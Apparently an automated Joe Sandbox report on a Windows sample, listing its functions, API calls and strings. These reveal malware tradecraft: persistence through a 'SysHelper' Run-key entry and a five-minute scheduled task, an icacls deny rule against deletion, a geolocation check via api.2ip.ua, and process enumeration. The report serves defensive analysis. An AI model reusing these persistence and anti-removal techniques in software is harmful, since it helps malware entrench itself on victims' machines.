Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0243FBF1

Part of subcall function 0242169C: std::exception::_Copy_str.LIBCMT ref: 024216B5

__CxxThrowException@8.LIBCMT ref: 0243FC06

Strings

TeM, xrefs: 0243FBFE
TeM, xrefs: 0243FBE7, 0243FBFB

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
String ID: TeM$TeM
API String ID: 3662862379-3870166017
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: 3de1c705da9dacc2cd6d1828d9938750203964cbb447f69a6db08bc5aba42180
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: 60D06775C0025CBBCB00EFA6D499CDDBBB9AA04744B408467A91897241EA74A34D8F98

Uniqueness

Uniqueness Score: -1.00%

Function 023FD0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 0241197D: __wfsopen.LIBCMT ref: 02411988

_fgetws.LIBCMT ref: 023FD15C

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: __wfsopen_fgetws
String ID:
API String ID: 853134316-0
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: c8b4b2d5b0bb3874a2171b7c9a5ac995fe0b13e75c0fc60895dfcbd805469cdd
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: AB91B372D1021DABCF61DFA4EC887AEB7B5BF04304F14052AEA19A3240E775EA44CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 023FD540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 023FD77E
_malloc.LIBCMT ref: 023FD7B2
_malloc.LIBCMT ref: 023FD7C1
_fprintf.LIBCMT ref: 023FD815

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:
API String ID: 1783060780-0
Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction ID: b39ecda3b25b66a0197daf542aa02e740846c98e170ca772079ea4e944b9e253
Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction Fuzzy Hash: 0DA16FB1C0025CEBEF11EFE5D849BDEBB76AF14308F140029D50676291D7B65A88CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 02412AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 02412B2E
__read_nolock.LIBCMT ref: 02412BFE
__filbuf.LIBCMT ref: 02412C21
_memset.LIBCMT ref: 02412C65

Part of subcall function 02415BA8: __getptd_noexit.LIBCMT ref: 02415BA8

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction ID: c3be24284eff52fee9859de1939b13e1a34a4cdbdec533ed179f4c775d1089c7
Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction Fuzzy Hash: 03518170A0021A9BDB29CF7989846AF77B6AF40324F14872FED35D62D0E7B09991CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0040F303 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040F337
__isleadbyte_l.LIBCMT ref: 0040F36B
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,75FF5003,00BFBBEF,00000000,?,?,?,0040DD66,00000109,00BFBBEF,00000003), ref: 0040F39C
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,0040DD66,00000109,00BFBBEF,00000003), ref: 0040F40A

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 356930a46b9939c7f4abf66d5cd4ec9e2d25bcebf949f38b53651e17aa1699d6
Instruction ID: 8a9955500a857a2ea05d2c05a6e4c1820c62b03486f1f61051fcecc9d9552f56
Opcode Fuzzy Hash: 356930a46b9939c7f4abf66d5cd4ec9e2d25bcebf949f38b53651e17aa1699d6
Instruction Fuzzy Hash: 8431AE31A04245EFDB30DFA4C880AAF7BA5FF01320B14857AE865AB6D1D334DD44DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE00 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0040CE26

Part of subcall function 0040CC4B: __fltout2.LIBCMT ref: 0040CC77

__cftog_l.LIBCMT ref: 0040CE4C
__cftoe_l.LIBCMT ref: 0040CE7E

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: d95f80c182f32d9331188ded4d3e2a6736ee8beee96367c4d186d35a0d874d0d
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: CD11833200014AFBCF125F94DC81CEE3F22BB18754B588626FE1865171D33AD972AB85

Uniqueness

Uniqueness Score: -1.00%

Function 02431359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0243137D

Part of subcall function 02431A9D: __fltout2.LIBCMT ref: 02431AC6

__cftog_l.LIBCMT ref: 024313A3
__cftoe_l.LIBCMT ref: 024313D5

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: edfc7e6f7d355cad6e776d3077875fe3a62463dc4a6e0420e86aca11bd84275f
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: FC01393240018ABBDF135E89DC418EE3F62BB1D355B48841AFA5D98520D376C5B2AB81

Uniqueness

Uniqueness Score: -1.00%

Function 024B7A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 024B7A4B

Part of subcall function 024B8140: ___BuildCatchObjectHelper.LIBCMT ref: 024B8172
Part of subcall function 024B8140: ___AdjustPointer.LIBCMT ref: 024B8189

_UnwindNestedFrames.LIBCMT ref: 024B7A62
___FrameUnwindToState.LIBCMT ref: 024B7A74
CallCatchBlock.LIBCMT ref: 024B7A98

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction ID: 93da8402aaa5045cab0beb4aa00899a2f266dfd4dabaf4e31ee421f9c4d2d87f
Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction Fuzzy Hash: FD01DB32000509BBCF13AF55CC00EDB7BAAEF89754F15811AFD1865120D732E561DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCC1 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0040BCCD

Part of subcall function 00408B9E: __getptd_noexit.LIBCMT ref: 00408BA1
Part of subcall function 00408B9E: __amsg_exit.LIBCMT ref: 00408BAE

__getptd.LIBCMT ref: 0040BCE4
__amsg_exit.LIBCMT ref: 0040BCF2
__lock.LIBCMT ref: 0040BD02

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 1aa7ad5b49f530668a183e90a73bc9b4148c36d86bbe409b38833e7a6cb32ddf
Instruction ID: 6443b9aa99e448e0bf6d3968ec2c12d9b7c28233359361c2743831e0af7b7073
Opcode Fuzzy Hash: 1aa7ad5b49f530668a183e90a73bc9b4148c36d86bbe409b38833e7a6cb32ddf
Instruction Fuzzy Hash: 46F062319446049AE620BB659502B4973A0EF40758F11453FF891B72C2CF7C99018A9D

Uniqueness

Uniqueness Score: -1.00%

Function 004030B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

__set_statfp.LIBCMT ref: 00406F4B
__set_statfp.LIBCMT ref: 00406F66

Strings

, xrefs: 00406F5E

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: __set_statfp
String ID:
API String ID: 441778723-3916222277
Opcode ID: b93f1ad6da9f161b26d3a0711e0015d76606c11cab6f739c25b9afbe528431d0
Instruction ID: 11aad54f2528882901bcf2db76df730d0c82508eaf9a44be09392f3084751756
Opcode Fuzzy Hash: b93f1ad6da9f161b26d3a0711e0015d76606c11cab6f739c25b9afbe528431d0
Instruction Fuzzy Hash: FB31D32154E7CA4BCB138B7458542A97F709E02324B2A02DBC8C1BB1E7D32C4E29C79A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 958B.exePID: 4708, Parent PID: 3636COMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	35.1%
Total number of Nodes:	815
Total number of Limit Nodes:	96

Executed Functions

Function 00419F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565COMMON

Download Yara Rule

APIs

Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6

GetCurrentProcess.KERNEL32 ref: 00419FC4
GetLastError.KERNEL32 ref: 00419FD2
SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
GetLastError.KERNEL32 ref: 00419FE4
GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0066C938,?), ref: 0041A0BB
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
GetCommandLineW.KERNEL32(?,?), ref: 0041A161

Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C

Strings

--Admin, xrefs: 0041A1B4, 0041A632
C:\Program Files\Google\, xrefs: 0041AFB9
--Service, xrefs: 0041A30B
C:\Windows\, xrefs: 0041AE0F
C:\Program Files (x86)\Google\, xrefs: 0041AEE7
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 0041A8A0
D:\Program Files\Mozilla Firefox\, xrefs: 0041B0A8
--AutoStart, xrefs: 0041A2EC
IsNotAutoStart, xrefs: 0041A645
--Task, xrefs: 0041A2CD
list<T> too long, xrefs: 0041B669, 0041B673
C:\Program Files\Internet Explorer\, xrefs: 0041AF73
x2Q, xrefs: 0041A856
D:\Program Files (x86)\Internet Explorer\, xrefs: 0041B062
IsTask, xrefs: 0041A1EE, 0041A299
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 0041A8B6
D:\Program Files (x86)\Google\, xrefs: 0041B085
x*P, xrefs: 0041ACE4
IsNotTask, xrefs: 0041A654
7P, xrefs: 0041B164
C:\Program Files (x86)\Internet Explorer\, xrefs: 0041AEA1
D:\Program Files\Google\, xrefs: 0041B0EE
C:\Program Files\Mozilla Firefox\, xrefs: 0041AF2D
I:\5d2860c89d774.jpg, xrefs: 0041B32F
%username%, xrefs: 0041B283
D:\Windows\, xrefs: 0041AFF3
D:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041B02E
D:\Program Files\Internet Explorer\, xrefs: 0041B0CB
F:\, xrefs: 0041B397
X1P, xrefs: 0041A485
IsAutoStart, xrefs: 0041A1D0, 0041A273
--ForNetRes, xrefs: 0041A22E
runas, xrefs: 0041A6CE
C:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041AE5B
<, xrefs: 0041A67B

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
API String ID: 2957410896-3144399390
Opcode ID: 4e221e8b1982176b129b84ba1772514faea9ee7e5f90ab573b61b5d7e00e66e5
Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
Opcode Fuzzy Hash: 4e221e8b1982176b129b84ba1772514faea9ee7e5f90ab573b61b5d7e00e66e5
Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 0040D26C
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
VariantInit.OLEAUT32(?), ref: 0040D2F0
VariantInit.OLEAUT32(?), ref: 0040D309
VariantInit.OLEAUT32(?), ref: 0040D322
VariantInit.OLEAUT32(?), ref: 0040D33B
VariantClear.OLEAUT32(?), ref: 0040D397
VariantClear.OLEAUT32(?), ref: 0040D3A4
VariantClear.OLEAUT32(?), ref: 0040D3B1
VariantClear.OLEAUT32(?), ref: 0040D3C2
CoUninitialize.OLE32 ref: 0040D3D5

Strings

Time Trigger Task, xrefs: 0040D43C, 0040D973
Trigger1, xrefs: 0040D6FA
--Task, xrefs: 0040D8DD
RegisterTaskDefinition. Err: %X, xrefs: 0040DA11
Author Name, xrefs: 0040D4C8
%Y-%m-%dT%H:%M:%S, xrefs: 0040D790
PT5M, xrefs: 0040D5A1, 0040D66C
2030-05-02T08:00:00, xrefs: 0040D737

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
API String ID: 2496729271-1738591096
Opcode ID: 1efdfb11a844a203d08e0e4f145d5e08f1aaf2256242cf998cfb11f6b568d62b
Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
Opcode Fuzzy Hash: 1efdfb11a844a203d08e0e4f145d5e08f1aaf2256242cf998cfb11f6b568d62b
Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040CF4A
InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
InternetCloseHandle.WININET(00000000), ref: 0040CFDA
InternetCloseHandle.WININET(00000000), ref: 0040CFDD

Strings

"country_code":", xrefs: 0040CFE1
https://api.2ip.ua/geo.json, xrefs: 0040CF79
Microsoft Internet Explorer, xrefs: 0040CF5A

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead_memset
String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
API String ID: 1485416377-2962370585
Opcode ID: 71a0bd55642238a68a3d19c02462a95739815b65a653bc795235a9caacf1cbf5
Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
Opcode Fuzzy Hash: 71a0bd55642238a68a3d19c02462a95739815b65a653bc795235a9caacf1cbf5
Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
_memset.LIBCMT ref: 00411D3B
RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
GetCommandLineW.KERNEL32 ref: 00411EB4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
UuidCreate.RPCRT4(?), ref: 00411EFC
UuidToStringW.RPCRT4(?,?), ref: 00411F14
RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
PathAppendW.SHLWAPI(?,?), ref: 00411F83
CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
DeleteFileW.KERNEL32(?), ref: 00412036
CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
_memset.LIBCMT ref: 00412090
lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
lstrcatW.KERNEL32(?,?), ref: 004120C0
lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
lstrlenW.KERNEL32(?), ref: 004120D7
RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
RegCloseKey.ADVAPI32(00000000), ref: 004120FC
_memset.LIBCMT ref: 00412120
SetLastError.KERNEL32(00000000), ref: 00412146
lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
lstrcatW.KERNEL32(?,?), ref: 0041216D

Strings

SysHelper, xrefs: 00411D5B, 004120EB
Shell32.dll, xrefs: 00411E94
D, xrefs: 00412128
" /deny *S-1-1-0:(OI)(CI)(DE,DC), xrefs: 0041216F
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00411D06, 00412064
" --AutoStart, xrefs: 00411DD1
SHGetFolderPathW, xrefs: 00411E9F
icacls ", xrefs: 0041214C
" --AutoStart, xrefs: 004120C2

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
API String ID: 2589766509-1182136429
Opcode ID: af0f6280857ed183423fa55c0dfc78c3cec959b41519de90f528b9b2836446d1
Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
Opcode Fuzzy Hash: af0f6280857ed183423fa55c0dfc78c3cec959b41519de90f528b9b2836446d1
Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32 ref: 00412235
CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
CloseHandle.KERNEL32(00000000), ref: 00412347

Strings

kernel32.dll, xrefs: 0041224E
GetModuleBaseNameW, xrefs: 00412277, 004122AC
Psapi.dll, xrefs: 0041228C
EnumProcesses, xrefs: 00412264, 00412299
EnumProcessModules, xrefs: 0041226C, 004122A1

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
API String ID: 3668891214-3807497772
Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00423576 Relevance: 15.3, APIs: 10, Instructions: 258
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 004235B1

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

__gmtime64_s.LIBCMT ref: 0042364A
__gmtime64_s.LIBCMT ref: 00423680
__gmtime64_s.LIBCMT ref: 0042369D
__allrem.LIBCMT ref: 004236F3
